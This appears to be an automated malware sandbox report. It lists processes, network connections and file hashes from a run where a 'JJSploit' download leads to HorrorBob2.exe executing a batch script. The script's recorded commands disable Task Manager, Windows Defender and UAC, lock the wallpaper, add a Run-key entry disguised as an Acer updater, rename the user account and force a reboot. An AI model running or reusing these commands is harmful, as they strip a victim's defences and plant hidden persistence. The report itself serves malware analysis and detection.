PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369&

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa1dccc40,0x7ffaa1dccc4c,0x7ffaa1dccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2068,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2156,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2372 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4540,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4548 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa1dccc40,0x7ffaa1dccc4c,0x7ffaa1dccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2076,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2220 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4364 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4428,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4248 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5008,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4284,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5220,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5232,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5376 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3316,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\HorrorBob2.exe

"C:\Users\Admin\Downloads\HorrorBob2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AD23.tmp\HorrorBob2.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3a33855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
N/A 224.0.0.251:5353 udp
GB 142.250.200.36:443 www.google.com udp
GB 142.250.200.36:443 www.google.com tcp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
GB 142.250.179.238:443 apis.google.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
GB 216.58.201.110:443 consent.google.com udp
GB 216.58.201.110:443 consent.google.com tcp
GB 172.217.169.78:443 clients2.google.com udp
GB 172.217.169.78:443 clients2.google.com tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
GB 216.58.201.110:443 consent.google.com tcp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
GB 216.58.201.110:443 consent.google.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
US 140.82.114.21:443 collector.github.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com udp
US 185.199.110.154:443 github.githubassets.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp

Files

\??\pipe\crashpad_3140_OENMXFHLMWOEDRLI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 c88e5d9e1541984437dd3700b8d8be78
SHA1 3566c9fbc3e79f557ba78b79af9b5a4ed5c8eef4
SHA256 843adbc7b11bdc2503206c64fd5c364309fb1879088c14d003c4750a61b33a24
SHA512 425ebf738beca1082ab20b0d97407589e26998bf40b6a58f24c9bc2c477adf2b3133fe79a7e54292232829a7be0ba34a85c249cc7649ed604a597eaf3cd6658f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 40fc3c871378d84b577bd616005d803d
SHA1 f3b49159571fe90bd278fb949704537ce98a7d7e
SHA256 ab83b09c2cf2e94b0b517d835d882eac8be78ed79dcd00409ead35841bb4afcf
SHA512 caa4e224b4fd73efc5a7e18c8dd1b56264884c43d3aa7e98b8b5c22decd88a27e0f4b30b68488d64d4e5cfc4b2aff8e2178c45644dfdc6ae0fa2141002b88fd6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ff09fc7d1b8cc74a4fc081a7c3232b2b
SHA1 acd4acc6a00fc2cdacf0f35430c470c7df77dca5
SHA256 b32bda6ded30a413692c4c505f29852f8d72121e3b3255f44d7de3150fad1ec8
SHA512 90e3835f938b85de2e50f81dc8a4a1b277cd87428d3f4ad5179b5d6e9459221db19313349a4bb808f3c28a487dd848bd7a312bd8e0f232bd6b2b7bc0af45b1e1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 4c72725266187cd8c3a38de44e306c9f
SHA1 080a5391bd924777c787fa72aba5dfc1317db2b8
SHA256 0d3e94496d7e6ae3d098e3c7c0c0b4b953b773c72ef6a247316cff3026166697
SHA512 7a90a1ef1a9a80a9a5ef2a28a21a8b568e8fd9e26dfd23108260d4399da28e8e126794541169e2398fe2d4284ac3c53a9e5891763f26d7bc26c5c476e5c4f1ca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 e91ee655fc370fc76cae70be75eb4da7
SHA1 b1c2a36a252373b78768ff0b8c7c414975f8230d
SHA256 2119db0210675f0217218459520534d0442fb93f8d2ad66ba4b20c8d2a430ac2
SHA512 6295ce62fc97be1ee529b0c4dde9d8b806e7972d89378d527740c3865bae85e089883634ad2c3a72b0f0c63f0a0758645733e9e8d9092fb87bd7cc3e95d6c7f1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

MD5 961e3604f228b0d10541ebf921500c86
SHA1 6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256 f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 ef48733031b712ca7027624fff3ab208
SHA1 da4f3812e6afc4b90d2185f4709dfbb6b47714fa
SHA256 c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99
SHA512 ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

MD5 916fb37e0663b788b2dc177ffa3b3a55
SHA1 537f556fd6580324aa6af1fc0d08f1d9a6eaf81b
SHA256 11f850160676d478950e9b3593e7471699e14ee1633e7ec90f67e8d22ed577bc
SHA512 2a4a8bd2ea449fc76dbce280f1825330945e75a25ca45f2c4829e358a8255f82f3e84db68975a2e95b663c5ceeb7a1b8d4d5db9bb211284a0243dce14d01c403

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL

MD5 53826ac60774da8ab420dfb652dcb153
SHA1 34a5e789f5d407d00b56bfa691aa4aaafc192b54
SHA256 ce6b23d61cf760c2fcac1e6b8e5b70cfc2e10c2715e8f9e2407edc3c75a01f7d
SHA512 93b7483b5fdaa2ab9b39613db7abfce9f3938d9994ced65a43eeb29b7ff44a372a4cbf091667ca3255bc350bf973acd315e5aad8e41790aa252748d416a80123

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

MD5 4d8b3bf7d9c42e7b25b5f5644dbdf920
SHA1 0f932897bad61c938849dc8df889a11dce9160e0
SHA256 0f65557fee09274ecb0f3f2155fdbd289db4b815cf64449e229741726c9005a1
SHA512 4ba78a50d252d1c68ba2c3a35af65e0c9adfc581193b925c0d5c5335a128623e4a87c07e11af723c289cb17bd17a2273e35ddbfc635e8441fb484bce06322249

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13373930710838382

MD5 54b43e5316efcb504a7f25c8b80e1671
SHA1 3ee9674728ef25057b7603a4e5354de3c6dab733
SHA256 36616e1c34f8b896eced66c4d27c221521a34c1a303cd9c89af89ba5dfab6315
SHA512 4ed4c40ba1954ce1e31b968fda9ba76afc4ee0f5fd533ab95d4a47e0fb037bdff5156044119eb0dd2f327d810f0d7df5b11459fa026a44c0f049d1f597173800

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

MD5 eae4516dcef465a24607a9b5a3144fc0
SHA1 42bdce307158b6a70d4e41d136b1c5865422db2b
SHA256 1415cbc56c878c82e9825d7421223e78717202f63bd98819eb91daab042e0b55
SHA512 a3e1a5ed2f2b6bf3bd71cbe35061a4b7aa0062e3e487863abdfee76d86782aaa26fcf17c3231dcf99ddcd370450f06bf2d332650cd528e265af59c040cdae5b0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

MD5 db7be30e1fc440e6c8c06071a1c85fab
SHA1 ac74ed586af9c044467472d087ba14eaa3c6b2ef
SHA256 4348ef7c2769302a7cfdfe6acbed859c855879667ea25e6bd34fa6cb3fc89a4a
SHA512 a7b63fca654c62198fba16d9e9818c31c96e86fb48a0aa6e5364ed9f57cac286d0f702824da9ec64220192e0a751daa745a10a0f8967dfb2d5f3c759101e381a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG

MD5 6f2809522b67127214f29f176486322e
SHA1 c021b8fcfa40fb837ab9162d9f3b9619ca40d5fc
SHA256 3c1855d1630c7db246ada37fe2226d26ee56fae99b514cd82c37b286bb414e25
SHA512 03c067c4875c72a097384aac44fec7b675abd1ea07f6c654e719b03a82e7125b2e2c710fb69757e2b65724df9f550e99d0c79b451e0fedf9aa268d1116a9dd2c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

MD5 6c0d0b4aca0aa4a3cfcef60e2b35e643
SHA1 2593bd7a9538a78111fbc9418ed733e8b4f76629
SHA256 bf363ec5ac05886d98c6c9015b7b2331899b6ae1dec2083a1d78d41dc591a865
SHA512 6979f56ef023fb0d3dd9a4fdf707829882297d04de2acc4e2ee9180a5f16ac5708dbdd64993f8d35bbc5cba08812711fca7e559bea5c1f4e3015e33f2298bc83

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

MD5 7cc634082be7688a7eb31ff1d226ce79
SHA1 79239c9542fbf916e3e33f551e887a64db997439
SHA256 105b9717e719a5c5abd30dd4e0e67efcef4fd01083bbc24e30c49080b763ef5c
SHA512 8840e07c1b4af29ffd4c50f0eb29a35bb2c2243f08bd2503d47fd9ba25c45bf68ed9062c087d919c7ed5af21619cac7e6c52373e930c231c836ac3261139a951

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

MD5 fbf98853ebd14b1e12df2135310ab839
SHA1 1be81a67bda4ba5f2d2b626d5d061986ff94160c
SHA256 47f3d7f3dec1b3dd64068f0a87c33410c895068de7a3d356b6bfa734b8813240
SHA512 9228f7a8c97bb74d652bdb0ec23e6ac7f859d51efde1671abc9e282a2c1e7791a8e969239b400ac20b2f6f3e70c7af4e26b4b8ef6fd466b1554fa1298bc7b9ba

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

MD5 7de3800af76e84461b34195ad484da08
SHA1 06806a53cc701039201c62c8ec8f08f990a35218
SHA256 6d4b3cfedb11ae8822935d4be498828d57c6c1e2350de077258f0524e72c88fc
SHA512 5cd8dc729a719955b60729cddf59af3122018672dd2377b496d762582c61eff476d6f6254f6bd0733fa13314993a983fa2bea0f853c9e60d20c0a1ac93649751

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

MD5 87e150ac07b8c2151e038afacfce0d3c
SHA1 5033fd042296cf1c3e6e40a39ba34355858cbe82
SHA256 da491fafbf84f8b2e7552459a8da2f392effda03ff28442efb6418691017d87b
SHA512 406ff08e06776a0a217b868aaa0ed53b931a20cb75ac5286189ec9ce066f8e46092f9e6f906aff6184b6975f267d57c55f919396dee632bf88f131a66439d28e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

MD5 3dfbf8c1bad21b3c5c89104d1a639ceb
SHA1 d7913c62d4113d17a164845ed7c8cfea427193be
SHA256 c297283526c918971e2078de88a58856a5f613338faf2eb80f7b353a84ab24cd
SHA512 af9ae19c84fa5fd9c53e15be3908fc9d8f50c23a8e87af3fedbe36dd4022dd5574db6bd4169943dfe82cd75949f12065ff3452b1924ae26e6ecc952c425c35af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

MD5 e257e4e0328cc00b67168d5055fd0e96
SHA1 3ff9d3e493f60f96abc9af648b519504abdfc123
SHA256 df57c3c87836128e9c226a74ce2d01633c37691db2128bc30b18860f772c72d2
SHA512 5bd798adebe05207de79628465eca778f6ee912f26cd94fc577e50d807b6218622c7318e1d0496613015fdc3604b209087f60959380a56750c3eaa7ee2983365

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

MD5 03caa06bc261d4d51f7cc650481d231f
SHA1 063afa8ba0bfaa1880af8420feb6604cd5860a8b
SHA256 a3c6c3ba385a906100d0b00be9477ca0889cfe5d3450ae99c0fb204e177700db
SHA512 04e83405a385e5177d54a129c7eb47f789978fc8e30b4c67a3ba3b1b08a1ce991d720e9634bc9377c81762c30677b97aa5acfdb7d602ee59656ceef8b8b2ccaa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

MD5 f1c75ea2173ffb8be3ed8e7eecbf1d19
SHA1 c124b66560d9cdbbcf33ef6e88a6e5354aa7629f
SHA256 3126fcc8a06fb694aacbe04aac610b065c1de1b732e4f8e3d1caabb5f32e8c08
SHA512 6099acd2ff61ff10b919d8bb07958f74563ea72f1dbf6d2f2659e50a721ae6ee0414f4030a6d702694d519cc3bc4fd6b06ef299e53e54f38264370a187c313a6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

MD5 fcffd8c6587b2591c8d2c0d9cdaf6626
SHA1 8a712cf13f2ed1111d91c1492f33cc1b3b381ab7
SHA256 8698de572f33a62d2654141c6c579e5c41c1a683dc251ecfbcbb999076f093d8
SHA512 2836f0423c0be64ee785c9656b598618bcd367ccf1103f3d17ab9f4ad4e433587a7fcb311f42be222af0ad23cb79d1d008bb72473472e0b4f6861ac7d1f01141

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

